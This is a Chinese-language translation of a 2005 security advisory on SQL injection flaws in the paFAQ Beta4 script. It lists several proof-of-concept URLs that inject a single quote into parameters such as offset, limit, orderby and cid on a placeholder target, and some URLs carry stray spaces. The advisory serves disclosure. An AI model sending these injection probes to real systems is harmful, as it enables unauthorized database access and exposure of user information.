翻译;Z.C.Y[B.C.T]
翻译网站:HTTP://WWW.BNSO.NET/
安全警告ID:1013232
资料来源:http://securitytracker.com/id?1013232
CVE 参考:http://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH
发布日期:2005-2-18
发布作者:Pi3cH of PersianHacker.NET Security Team
漏洞影响:泄露系统信息,泄露用户信息,用户操作
含有利用方法:是
影响版本:Beta4
描述:几处输入合法性漏洞存在于paFAQ。远程用户可以注入SQL指令。
几个脚本对用户提交给某些参数的输入值并没有验证完全。其中'question.php', 'answer.php', 'search.php', 和 'comment.php'
脚本受到影响。远程用户可以提交一个精心构造地址在存在的数据库中执行任意的SQL指令。
提供如下利用方法:
http://[target]/index.php?act=Question&id=1&limit=10&orderby=q_id&order=DESC&offset='
http://[ta rget]/index.php?act=Question&id=1&orderby=q_id&order=DESC&limit='
http://[target]/index.php?act=Question&id=1&orderby=q_id&order='&limit=10
http://[target]/index.php?ac t=Question&id=1&orderby='&order=DESC&limit=10
http://[target]/index.php?act=Answer&cid=1&id=1&offset='
http://[target]/index.php?act=Search&code=01&search_item='
http: //[target]/index.php?act=Speak&code=05&poster=1&name=2&question=3&email=4&cat_id='
http://[target]/index.php?act=Speak&code=02&cid='&id=1&poster=1&name=2&answer=3&email= 4
http://[target]/index.php?act=Speak&code=02&cid=1&id='&poster=1&name=2&answer=3&email=4
漏洞影响:远程用户可以执行任意SQL指令
解决方法:目前没有官方补丁
官方地址:http://www.phparena.net/pafaq.php
漏洞起因:输入合法性错误
影响系统:所有的Linux, UNIX
| 
网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!)